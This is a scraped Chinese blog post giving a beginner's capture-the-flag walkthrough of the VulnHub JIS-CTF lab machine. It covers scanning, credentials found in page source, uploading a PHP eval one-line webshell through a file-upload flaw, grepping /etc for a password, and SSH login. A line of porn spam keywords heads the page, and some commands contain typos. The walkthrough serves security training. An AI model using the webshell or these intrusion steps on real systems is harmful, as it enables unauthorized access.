国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Vulnhub靶機(jī)滲透之新手入門 JIS-CTF入門靶場-學(xué)習(xí)筆記

這篇具有很好參考價(jià)值的文章主要介紹了Vulnhub靶機(jī)滲透之新手入門 JIS-CTF入門靶場-學(xué)習(xí)筆記。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

目錄

學(xué)習(xí)前言

準(zhǔn)備工作

一、尋找目標(biāo)主機(jī)(信息收集)

二、敏感文件

三、Getshell上傳木馬

用蟻劍進(jìn)行Getshell

四、尋找Linux密碼進(jìn)行ssh連接

五、連接SSH最后一步

六、總結(jié)


學(xué)習(xí)前言

vulnhub是個(gè)提供各種漏洞平臺(tái)的綜合靶場,可供下載多種虛擬機(jī)進(jìn)行下載,本地VM打開即可,像做游戲一樣去完成滲透測試、提權(quán)、漏洞利用、代碼審計(jì)等等有趣的實(shí)戰(zhàn)。

Vulnhub官網(wǎng)連接:vulnhub官網(wǎng)

今天用到的入門靶場:JIS-CTF: VulnUpload ~ VulnHub??????

準(zhǔn)備工作

環(huán)境:Kali Liunx 任意版本都得,JIS-CTF靶機(jī)也是Linux,中國蟻劍、菜刀、冰蝎,任意一個(gè)都行

用來getshell。

這個(gè)靶場一共有5個(gè)flag,我們一一來找出所有得flag

一、尋找目標(biāo)主機(jī)(信息收集)

因?yàn)槟繕?biāo)主機(jī)和我們在同一個(gè)網(wǎng)段,我們可以掃描一一下我們的網(wǎng)卡

首先使用 ipconfig -a 來查看我們的網(wǎng)卡信息

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

我們的網(wǎng)卡叫eth0 ,所以我們對(duì)這個(gè)網(wǎng)卡進(jìn)行掃描這個(gè)網(wǎng)卡里有多少臺(tái)設(shè)備

netdiscover -i eth0

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

可以看到有一個(gè)192.168.159.133、?192.168.159.1、192.168.159.2

這樣我們直接可以確定IP就是192.168.159.133,因?yàn)楹髢蓚€(gè)一個(gè)應(yīng)該是作為網(wǎng)關(guān)地址

如果還是不確定,那么我么可以用nmap來掃描一下這個(gè)網(wǎng)段

nmap -sn 192.168.159.0/24

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

基本可以確定目標(biāo)主機(jī)就是:192.168.159.133

然后我們可以先用nmap來掃一下它的版本信息,或者開放的端口

nmap -sV 192.168.159.133

?vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?然后我們可以發(fā)現(xiàn)開放的端口有22、80

我們馬上就可以聯(lián)想到它對(duì)應(yīng)80端口上有個(gè)網(wǎng)站,我們試著打開網(wǎng)站試試

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

進(jìn)來后發(fā)現(xiàn)是個(gè)登入界面,貌似沒有什么信息,我們對(duì)它的目錄進(jìn)行掃描一下

 dirb http://192.168.159.133

?vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?一眼看上去有兩個(gè)敏感的文件,一個(gè)是flag應(yīng)該就是我們想要的答案了,還有一個(gè)是robots.txt

試著訪問一下flag

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?第一個(gè)flag找到了

二、敏感文件

上面我們掃描的時(shí)候發(fā)現(xiàn)有:

==> http://192.168.159.133/server-status
==> DIRECTORY: http://192.168.159.133/admin_area/                                                                                                                               
==> DIRECTORY: http://192.168.159.133/assets/                                                                                                                                   
==> DIRECTORY: http://192.168.159.133/css/                                                                                                                                      
==> DIRECTORY: http://192.168.159.133/flag/

我們試著打開一下看看有啥收獲

訪問這個(gè)的時(shí)候發(fā)現(xiàn)了這個(gè)文件信息暴漏,好像并沒有什么卵用,找了一圈一沒發(fā)現(xiàn)啥

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?我么打開?http://192.168.159.133/admin_area/的時(shí)候

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?當(dāng)我還是一頭霧水的時(shí)候,按下了F12 看到了想要的 答案了

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?還得到

username : admin
password : 3v1l_H@ck3r

三、Getshell上傳木馬

上面我們得到了賬號(hào)和密碼,我們試著登入主站試試

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?登入成功?。?!

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?這一看就是可以上傳文件得,我們看看試著寫一句話木馬

<?php eval($_POST['cmd'])?>

然后上傳,發(fā)現(xiàn)直接上傳成功了!任意文件上傳

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

我正要開心得時(shí)候,發(fā)現(xiàn)我們得文件上傳去哪了??我試著抓包發(fā)現(xiàn)

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

沒有什么有用的消息,然后想起來還有個(gè)目錄我們沒有查看,那就是robot.txtvulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

唉,我們看到了 兩個(gè)敏感的文件

Disallow: /uploads

Disallow: /uploaded_files

?最后我們發(fā)現(xiàn)/uploaded_files里就是存放我們上傳的文件的路徑

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

用蟻劍進(jìn)行Getshell

打開中國蟻劍、連接我們的shell

?vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

連接成功

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

把網(wǎng)站的文件都打開一遍

發(fā)先flag藏在了hint.txt里面?

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

四、尋找Linux密碼進(jìn)行ssh連接

但是它有又提示

try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

意思是嘗試使用?technawi 用戶名 來查看flag.txt文件

那么我們怎么能找到這個(gè) 用戶的密碼呢

我們知道Linux中的password 是存放在 /etc/passwd/ 里面

打開后發(fā)現(xiàn)了我們需要的哪個(gè)用戶名:

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?X:代表存放在 /etc/shadow/

但是我們沒有權(quán)限查看它

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?只能就此放棄了,然后想想是不是在/etc/下或者其他文件下藏著一段flag呢?

我們用 grep 命令來尋找一下這個(gè)flag到底在哪

grep -sr technawi 'The flag 4th' /etc/

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php我們看到有個(gè)文件里里面有”The flag 4th“等關(guān)鍵詞

我們?nèi)ゴ蜷_它

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?看到了第四個(gè)flag

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

還獲得了用戶名和密碼:

username : technawi
password : 3vilH@ksor?

五、連接SSH最后一步

直接用kali 連接就行了

shh technawi@192.168.159.133

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

?連接成功后直接查看剛剛哪個(gè)權(quán)限受限的flag.txt就可以了

cat /var/www/html/flag.txt

vulnhub入門,網(wǎng)絡(luò)安全學(xué)習(xí),學(xué)習(xí),安全,web安全,網(wǎng)絡(luò),php

最后的flag也出來啦?。?!

六、總結(jié)

Vulnhub JIS-CTF入門的靶機(jī)是非常適合剛?cè)腴T的小伙伴,拿去練習(xí),雖然挑戰(zhàn)性不大,但是還是很有必要去來練習(xí)的,這個(gè)主要是考察一個(gè)很簡單的滲透過程,在真實(shí)環(huán)境當(dāng)中,需要我們更多的是隨機(jī)應(yīng)變,加油網(wǎng)安人,讓我們一起共同進(jìn)步吧!文章來源地址http://www.zghlxwxcb.cn/news/detail-633946.html

到了這里,關(guān)于Vulnhub靶機(jī)滲透之新手入門 JIS-CTF入門靶場-學(xué)習(xí)筆記的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • vulnhub_DeRPnStiNK靶機(jī)滲透測試

    vulnhub_DeRPnStiNK靶機(jī)滲透測試

    VulnHub2018_DeRPnStiNK靶機(jī) https://www.vulnhub.com/entry/derpnstink-1,221/ flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) 信息收集 使用nmap掃描靶機(jī)發(fā)現(xiàn)開放了 21 22 80 端口,

    2024年02月08日
    瀏覽(43)
  • [滲透測試學(xué)習(xí)靶機(jī)07] vulnhub靶場 Prime 2

    [滲透測試學(xué)習(xí)靶機(jī)07] vulnhub靶場 Prime 2

    Kali的IP地址:192.168.127.139 靶機(jī)的IP地址:192.168.127.145 目錄 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提權(quán) 總結(jié): Prime 2這個(gè)靶機(jī)我看網(wǎng)上很少有人通關(guān)打靶練習(xí),自己嘗試做了一下,感覺整體難度:比較難,大家可以參考一下。 1.1、掃描主機(jī)IP 1.2、掃描端口 發(fā)現(xiàn)開放了

    2024年02月05日
    瀏覽(23)
  • [VulnHub靶機(jī)滲透]:billu_b0x 快速通關(guān)

    目錄 前言: 訪問80端口的web頁面 1.掃描目錄

    2024年01月21日
    瀏覽(16)
  • 看完這篇 教你玩轉(zhuǎn)滲透測試靶機(jī)vulnhub——My File Server: 2

    看完這篇 教你玩轉(zhuǎn)滲透測試靶機(jī)vulnhub——My File Server: 2

    vulnhub是個(gè)提供各種漏洞平臺(tái)的綜合靶場,可供下載多種虛擬機(jī)進(jìn)行下載,本地VM打開即可,像做游戲一樣去完成滲透測試、提權(quán)、漏洞利用、代碼審計(jì)等等有趣的實(shí)戰(zhàn)。 這是一個(gè)漏洞靶機(jī),老樣子需要找到flag即可。 官方下載:https://download.vulnhub.com/myfileserver/My_file_server_2.o

    2023年04月19日
    瀏覽(24)
  • vulnhub靶機(jī)AI-Web-1.0滲透筆記(文件上傳,提權(quán)部分各種姿勢)

    vulnhub靶機(jī)AI-Web-1.0滲透筆記(文件上傳,提權(quán)部分各種姿勢)

    信息收集就略了,nmap就可以了,沒有太多知識(shí) 你會(huì)收集到 1.網(wǎng)頁絕對(duì)路徑,這里通過sql注入上傳文件或者通過sqlmap獲取–os-shell會(huì)用到 2.http://靶場ip/se3reTdir777/index.php# 這是一個(gè)sql注入頁面 先測試有無SQL注入漏洞,輸入SQL注入測試神技? \\\' 進(jìn)行測試 提示我們存在SQL語句錯(cuò)誤,表

    2024年01月21日
    瀏覽(48)
  • 實(shí)訓(xùn)滲透靶場02|3星vh-lll靶機(jī)|vulnhub靶場Node1

    實(shí)訓(xùn)滲透靶場02|3星vh-lll靶機(jī)|vulnhub靶場Node1

    寫在前面: 此博客僅用于記錄個(gè)人學(xué)習(xí)進(jìn)度,學(xué)識(shí)淺薄,若有錯(cuò)誤觀點(diǎn)歡迎評(píng)論區(qū)指出。歡迎各位前來交流。(部分材料來源網(wǎng)絡(luò),若有侵權(quán),立即刪除) netdiscover掃描目的IP 發(fā)現(xiàn)開放端口為22和3000 訪問3000 3000端口是node 對(duì)node.js稍有了解的都知道 3000是node.js的默認(rèn)端口,簡

    2024年02月13日
    瀏覽(35)
  • GitHub新手用法詳解【適合新手入門-建議收藏?。?!】

    GitHub新手用法詳解【適合新手入門-建議收藏?。?!】

    目錄 什么是Github,為什么使用它? 一、GitHub賬號(hào)的注冊與登錄 二、?gitbash安裝詳解 1.git bash的下載與安裝 2.git常用命令 ?3. Git 和 GitHub 的綁定 1. 獲取SSH keys ?2.綁定ssh密鑰 三、通過Git將代碼提交到GitHub 1.克隆倉庫? ?2.測試提交代碼 ? ? ? ? GitHub是一個(gè)面向開源及私有軟件項(xiàng)

    2023年04月24日
    瀏覽(93)
  • Midjourney新手入門指南

    Midjourney新手入門指南

    我們來看一下百度百科的回復(fù) 是不是有點(diǎn)蒙,沒關(guān)系,一句話概括:用描述來生成圖像的AI工具。 你可能又有一門了,discord是什么?為什么要下載它?我們來看看百度百科 原因:Midjouney 沒有自己的客戶端,它是搭載在Discord上。 Discord 簡單來說,就是一個(gè)聊天應(yīng)用。

    2024年02月10日
    瀏覽(28)
  • PyCharm新手入門指南

    PyCharm新手入門指南

    安裝好Pycharm后,就可以開始編寫第一個(gè)函數(shù):Hello World啦~我們就先來學(xué)習(xí)一些基本的操作,主要包含新建Python文件,運(yùn)行代碼,查看結(jié)果等等。 文章主要包含五個(gè)部分: 一、界面介紹 主要分為菜單欄、項(xiàng)目目錄、編輯區(qū)域、終端區(qū)和運(yùn)行/調(diào)試代碼區(qū)域。 1、菜單欄:一些新

    2024年02月13日
    瀏覽(24)
  • HLS新手入門教程

    HLS新手入門教程

    HLS是一種高級(jí)綜合技術(shù),它允許開發(fā)人員使用高級(jí)語言(如C、C++和SystemC)來描述數(shù)字電路的行為和功能,然后將其轉(zhuǎn)換為硬件電路實(shí)現(xiàn)。這種轉(zhuǎn)換過程是自動(dòng)完成的,因此開發(fā)人員無需手動(dòng)編寫硬件描述語言(HDL)。 HLS的主要目的是簡化FPGA設(shè)計(jì)流程,提高設(shè)計(jì)效率和設(shè)計(jì)質(zhì)

    2024年02月02日
    瀏覽(35)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包